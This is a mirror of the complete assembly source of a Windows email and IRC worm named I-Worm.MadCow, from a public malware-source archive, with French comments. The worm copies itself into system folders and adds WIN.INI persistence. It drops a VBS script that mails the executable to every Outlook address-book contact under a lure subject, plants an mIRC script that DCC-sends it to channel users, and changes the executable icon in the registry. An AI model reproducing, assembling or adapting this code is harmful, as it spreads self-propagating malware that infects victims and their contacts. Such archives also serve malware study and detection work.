mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-07 02:45:27 +00:00
354 lines
14 KiB
NASM
354 lines
14 KiB
NASM
comment * ///// I-Worm.MadCow par PetiK ///// 25/11/2000
|
||
|
||
Pour assembler : tasm32 /M /ML madcow.asm
|
||
tlink32 -Tpe -aa -x madcow.obj,,,import32.lib *
|
||
|
||
jumps
|
||
locals
|
||
.386
|
||
.model flat,stdcall
|
||
|
||
;KERNEL32.dll
|
||
extrn lstrcat:PROC
|
||
extrn WritePrivateProfileStringA:PROC
|
||
extrn CloseHandle:PROC
|
||
extrn CopyFileA:PROC
|
||
extrn CreateDirectoryA:PROC
|
||
extrn CreateFileA:PROC
|
||
extrn DeleteFileA:PROC
|
||
extrn ExitProcess:PROC
|
||
extrn GetModuleFileNameA:PROC
|
||
extrn GetModuleHandleA:PROC
|
||
extrn GetSystemDirectoryA:PROC
|
||
extrn GetWindowsDirectoryA:PROC
|
||
extrn MoveFileA:PROC
|
||
extrn WinExec:PROC
|
||
extrn WriteFile:PROC
|
||
|
||
;ADVAPI32.dll
|
||
extrn RegSetValueExA:PROC
|
||
extrn RegCreateKeyExA:PROC
|
||
extrn RegCloseKey:PROC
|
||
|
||
.data
|
||
regDisp dd 0
|
||
regResu dd 0
|
||
l dd 0
|
||
p dd 0
|
||
fh dd 0
|
||
octets dd ?
|
||
szOrig db 260 dup (0)
|
||
szOrig2 db 260 dup (0)
|
||
szCopie db 260 dup (0)
|
||
szCopi2 db 260 dup (0)
|
||
szCico db 260 dup (0)
|
||
szWin db 260 dup (0)
|
||
Dossier db "C:\Win32",00h
|
||
fichier db "C:\Win32\Salut.ico",00h
|
||
Copico db "\MSLS.ICO",00h
|
||
Copie db "\Wininet32.exe",00h
|
||
Copie2 db "\MadCow.exe",00h
|
||
BATFILE db "C:\Win32\ENVOIE.BAT",00h
|
||
VBSFILE db "C:\Win32\ENVOIE.VBS",00h
|
||
Winini db "\\WIN.INI",00h
|
||
run db "run",00h
|
||
windows db "windows",00h
|
||
fileini db "C:\Win32\script.ini",00h
|
||
Copie3 db "C:\Win32\MadCow.exe",00h
|
||
script1 db "C:\mirc\script.ini",00h
|
||
script2 db "C:\mirc32\script.ini",00h
|
||
script3 db "C:\program files\mirc\script.ini",00h
|
||
script4 db "C:\program files\mirc32\script.ini",00h
|
||
CLE db "Software\[Atchoum]",00h
|
||
CLE2 db "\exefile\DefaultIcon",00h
|
||
Signature db "IWorm.MadCow par PetiK (c)2000"
|
||
|
||
vbsd:
|
||
db 'DEBUT()',0dh,0ah
|
||
db 'Sub DEBUT()',0dh,0ah
|
||
db 'EMAIL()',0dh,0ah
|
||
db 'End Sub',0dh,0ah
|
||
db '',0dh,0ah
|
||
db 'Sub EMAIL()',0dh,0ah
|
||
db 'Set K = CreateObject("Outlook.Application")',0dh,0ah
|
||
db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah
|
||
db 'For Each M In L.AddressLists',0dh,0ah
|
||
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
|
||
db 'Set N = K.CreateItem(0)',0dh,0ah
|
||
db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
|
||
db 'Set P = M.AddressEntries(O)',0dh,0ah
|
||
db 'If O = 1 Then',0dh,0ah
|
||
db 'N.BCC = P.Address',0dh,0ah
|
||
db 'Else',0dh,0ah
|
||
db 'N.BCC = N.BCC & "; " & P.Address',0dh,0ah
|
||
db 'End If',0dh,0ah
|
||
db 'Next',0dh,0ah
|
||
db 'N.Subject = "Pourquoi les vaches sont-elles folles ?"',0dh,0ah
|
||
db 'N.Body = "Voila un rapport expliquant la folie des vaches"',0dh,0ah
|
||
db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah
|
||
db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(0),"MadCow.exe")',0dh,0ah
|
||
db 'N.Send',0dh,0ah
|
||
db 'End If',0dh,0ah
|
||
db 'Next',0dh,0ah
|
||
db 'End Sub',0dh,0ah
|
||
vbstaille equ $-vbsd
|
||
|
||
batd:
|
||
db '@echo off',0dh,0ah
|
||
db 'start C:\Win32\ENVOIE.VBS',0dh,0ah
|
||
battaille equ $-batd
|
||
|
||
inid:
|
||
db "[script]",0dh,0ah
|
||
db "n0=on 1:JOIN:#:{",0dh,0ah
|
||
db "n1= /if ( $nick == $me ) { halt }",0dh,0ah
|
||
db "n2= /.dcc send $nick C:\Win32\MadCow.exe",0dh,0ah
|
||
db "n3=}",00h
|
||
initaille equ $-inid
|
||
|
||
include icone.inc
|
||
|
||
.code
|
||
DEBUT:
|
||
VERIF: mov eax,offset CLE ; V<>rifie si il existe une cl<63>
|
||
call REG ; [Atchoum] dans HKLM\Software.
|
||
cmp [regDisp],1 ; Si elle n'y est pas,
|
||
jne INIFILE ; on installe les composants
|
||
|
||
COPIE: push 0 ;
|
||
call GetModuleHandleA ;
|
||
push 260 ;
|
||
push offset szOrig ;
|
||
push eax ;
|
||
call GetModuleFileNameA ; Copie le fichier original
|
||
push 260 ;
|
||
push offset szCopie ;
|
||
call GetSystemDirectoryA ; dans le dossier SYSTEM
|
||
push offset Copie ;
|
||
push offset szCopie ;
|
||
call lstrcat ; sous le nom de Wininet32.exe
|
||
push 00h ;
|
||
push offset szCopie ;
|
||
push offset szOrig ;
|
||
call CopyFileA ;
|
||
push 260 ; puis
|
||
push offset szCopi2 ;
|
||
call GetWindowsDirectoryA ; <20> nouveau dans le dossier WINDOWS
|
||
push offset Copie2 ;
|
||
push offset szCopi2 ;
|
||
call lstrcat ; sous le nom de MadCow.exe
|
||
push 00h ;
|
||
push offset szCopi2 ;
|
||
push offset szOrig ;
|
||
call CopyFileA ;
|
||
|
||
WIN_INI:push 260 ; Pour lancer le programme, on peut
|
||
push offset szWin ;
|
||
call GetWindowsDirectoryA ; utiliser la base de registre ou le
|
||
push offset Winini ;
|
||
push offset szWin ; fichier WIN.INI dans le dossier
|
||
call lstrcat ;
|
||
push offset szWin ; WINDOWS. La d<>marche est simple :
|
||
push offset szCopie ; [windows]
|
||
push offset run ; run="nom du programme"
|
||
push offset windows ;
|
||
call WritePrivateProfileStringA ;
|
||
|
||
DIR: push 00h ; On cr<63>e ici C:\Win32
|
||
push offset Dossier ;
|
||
call CreateDirectoryA ;
|
||
EMAIL :push 00000000h ; On va cr<63>er C:\Win32\ENVOIE.VBS
|
||
push 00000080h ;
|
||
push 00000002h ;
|
||
push 00000000h ;
|
||
push 00000001h ;
|
||
push 40000000h ;
|
||
push offset VBSFILE ;
|
||
call CreateFileA ;
|
||
mov [fh],eax ;
|
||
push 00h ;
|
||
push offset octets ;
|
||
push vbstaille ;
|
||
push offset vbsd ;
|
||
push [fh] ;
|
||
call WriteFile ;
|
||
push [fh] ;
|
||
call CloseHandle ;
|
||
EXEC :push 00000000h ; et C:\Win32\ENVOIE.BAT
|
||
push 00000080h ;
|
||
push 00000002h ; qui va <20>x<EFBFBD>cuter ENVOIE.VBS
|
||
push 00000000h ;
|
||
push 00000001h ;
|
||
push 40000000h ;
|
||
push offset BATFILE ;
|
||
call CreateFileA ;
|
||
mov [fh],eax ;
|
||
push 00h ;
|
||
push offset octets ;
|
||
push battaille ;
|
||
push offset batd ;
|
||
push [fh] ;
|
||
call WriteFile ;
|
||
push [fh] ;
|
||
call CloseHandle ;
|
||
jmp EXECBAT ;
|
||
|
||
REG: push offset regDisp ;
|
||
push offset regResu ;
|
||
push 0 ;
|
||
push 0F003Fh ;
|
||
push 0 ;
|
||
push 0 ;
|
||
push 0 ;
|
||
push eax ; Software\[Atchoum]
|
||
push 80000002h ; HKEY_LOCAL_MACHINE
|
||
call RegCreateKeyExA ;
|
||
push [regResu] ; met la valeur dans regResu
|
||
call RegCloseKey ;
|
||
ret ;
|
||
|
||
INIFILE:push 00000000h ; On va cr<63>er dans C:\Win32
|
||
push 00000001h ;
|
||
push 00000002h ; le fichier script.ini
|
||
push 00000000h ;
|
||
push 00000001h ; en lecture seul.
|
||
push 40000000h ;
|
||
push offset fileini ;
|
||
call CreateFileA ;
|
||
mov [fh],eax ;
|
||
push 00h ;
|
||
push offset octets ;
|
||
push initaille ;
|
||
push offset inid ;
|
||
push [fh] ;
|
||
call WriteFile ;
|
||
push [fh] ;
|
||
call CloseHandle ;
|
||
|
||
push 00h ; On va copier ce fichier dans les
|
||
push offset script1 ; r<>pertoire suivant :
|
||
push offset fileini ;
|
||
call CopyFileA ; C:\mirc C:\mirc32
|
||
test eax,eax ; C:\program files\mirc et dans
|
||
jnz COPYWIN ; C:\program files\mirc32
|
||
push 00h ;
|
||
push offset script2 ; Si il arrive <20> se copier dans un
|
||
push offset fileini ; de ces fichier, il va cr<63>er une
|
||
call CopyFileA ; copie du programme dans C:\Win32
|
||
test eax,eax ; le nom MadCow.exe
|
||
jnz COPYWIN ;
|
||
push 00h ;
|
||
push offset script3 ;
|
||
push offset fileini ;
|
||
call CopyFileA ;
|
||
test eax,eax ;
|
||
jnz COPYWIN ;
|
||
push 00h ;
|
||
push offset script4 ;
|
||
push offset fileini ;
|
||
call CopyFileA ;
|
||
test eax,eax ;
|
||
jz ICOFILE ;
|
||
|
||
COPYWIN:push 0 ;
|
||
call GetModuleHandleA ;
|
||
push 260 ;
|
||
push offset szOrig2 ;
|
||
push eax ;
|
||
call GetModuleFileNameA ; Copie le fichier original
|
||
push 00h ;
|
||
push offset Copie3 ;
|
||
push offset szOrig2 ;
|
||
call CopyFileA ;
|
||
jmp FIN ;
|
||
|
||
ICOFILE:push 00000000h ; On va cr<63>er <20> la base du disque
|
||
push 00000080h ;
|
||
push 00000002h ; dur le fichier Salut.ico
|
||
push 00000000h ;
|
||
push 00000001h ;
|
||
push 40000000h ;
|
||
push offset fichier ;
|
||
call CreateFileA ;
|
||
mov [fh],eax ;
|
||
push 00h ;
|
||
push offset octets ;
|
||
push icotaille ;
|
||
push offset icod ;
|
||
push [fh] ;
|
||
call WriteFile ;
|
||
push [fh] ;
|
||
call CloseHandle ;
|
||
push 260 ; On d<>place le fichier Salut.ico
|
||
push offset szCico ;
|
||
call GetSystemDirectoryA ; dans le dossier SYSTEM sous
|
||
push offset Copico ;
|
||
push offset szCico ; MSLS.ICO
|
||
call lstrcat ;
|
||
push offset szCico ;
|
||
push offset fichier ;
|
||
call MoveFileA ; => c'est fait
|
||
|
||
REG2: push offset l ;
|
||
push offset p ;
|
||
push 0 ;
|
||
push 1F0000h + 1 + 2h ;
|
||
push 0 ;
|
||
push 0 ;
|
||
push 0 ;
|
||
push offset CLE2 ; Run
|
||
push 80000000h ; HKEY_CLASSES_ROOT
|
||
call RegCreateKeyExA ;
|
||
push 05h ;
|
||
push offset szCico ; %system%\MSLS.ico
|
||
push 01h ;
|
||
push 0 ;
|
||
push 00h ; VALEUR PAR DEFAUT
|
||
push p ;
|
||
call RegSetValueExA ; CREE UN REGISTRE
|
||
push 0 ;
|
||
call RegCloseKey ; FERME LA BASE DE REGISTRE
|
||
jmp FIN ; PUIS TERMINE LE PROGRAMME
|
||
|
||
EXECBAT:push 01h ; On <20>x<EFBFBD>cute le fichier ENVOIE.BAT
|
||
push offset BATFILE ;
|
||
call WinExec ;
|
||
FIN: push 00h ; FIN DU PROGRAMME
|
||
call ExitProcess ;
|
||
|
||
end DEBUT
|
||
|
||
*************************************************************************
|
||
|
||
comment *
|
||
|
||
ICONE.INC pour I-Worm.MadCow
|
||
CE FICHIER EST LA FORME HEXADECIMAL DE L'ICONE QUE L'ON VEUT CREER
|
||
*
|
||
|
||
icod:
|
||
db 000h,000h,001h,000h,001h,000h,010h,010h,010h,000h,000h,000h,000h,000h
|
||
db 028h,001h,000h,000h,016h,000h,000h,000h,028h,000h,000h,000h,010h,000h
|
||
db 000h,000h,020h,000h,000h,000h,001h,000h,004h,000h,000h,000h,000h,000h
|
||
db 0C0h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,010h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,080h,000h
|
||
db 000h,080h,000h,000h,000h,080h,080h,000h,080h,000h,000h,000h,080h,000h
|
||
db 080h,000h,080h,080h,000h,000h,0C0h,0C0h,0C0h,000h,080h,080h,080h,000h
|
||
db 000h,000h,0FFh,000h,000h,0FFh,000h,000h,000h,0FFh,0FFh,000h,0FFh,000h
|
||
db 000h,000h,0FFh,000h,0FFh,000h,0FFh,0FFh,000h,000h,0FFh,0FFh,0FFh,000h
|
||
db 0FFh,0FFh,0FFh,0FFh,0FFh,0FFh,0FFh,0FFh,0F0h,000h,000h,000h,000h,000h
|
||
db 000h,00Fh,0F0h,000h,000h,000h,000h,000h,000h,00Fh,0F0h,000h,000h,00Fh
|
||
db 0FFh,000h,000h,00Fh,0F0h,000h,000h,0F0h,000h,0F0h,000h,00Fh,0F0h,000h
|
||
db 000h,0F0h,000h,0F0h,000h,00Fh,0F0h,000h,00Fh,000h,000h,00Fh,000h,00Fh
|
||
db 0F0h,000h,00Fh,000h,00Fh,00Fh,000h,00Fh,0F0h,000h,0F0h,0FFh,000h,0F0h
|
||
db 0F0h,00Fh,0F0h,000h,0F0h,000h,000h,000h,0F0h,00Fh,0F0h,000h,00Fh,000h
|
||
db 000h,00Fh,000h,00Fh,0F0h,000h,00Fh,0FFh,0FFh,0FFh,000h,00Fh,0F0h,000h
|
||
db 0F0h,000h,000h,000h,0F0h,00Fh,0F0h,000h,00Fh,000h,000h,00Fh,000h,00Fh
|
||
db 0F0h,000h,000h,000h,000h,000h,000h,00Fh,0FFh,0FFh,0FFh,0FFh,0FFh,0FFh
|
||
db 0FFh,0FFh,000h,000h,0FFh,0FFh,07Fh,0FEh,0FFh,0FFh,07Fh,0FEh,0FFh,0FFh
|
||
db 07Eh,03Eh,0FFh,0FFh,07Dh,0DEh,0FFh,0FFh,07Dh,0DEh,0FFh,0FFh,07Bh,0EEh
|
||
db 0FFh,0FFh,07Bh,0AEh,0FFh,0FFh,074h,0D6h,0FFh,0FFh,077h,0F6h,0FFh,0FFh
|
||
db 07Bh,0EEh,0FFh,0FFh,078h,00Eh,0FFh,0FFh,077h,0F6h,0FFh,0FFh,07Bh,0EEh
|
||
db 0FFh,0FFh,07Fh,0FEh,0FFh,0FFh,000h,000h,0FFh,0FFh
|
||
icotaille equ $-icod
|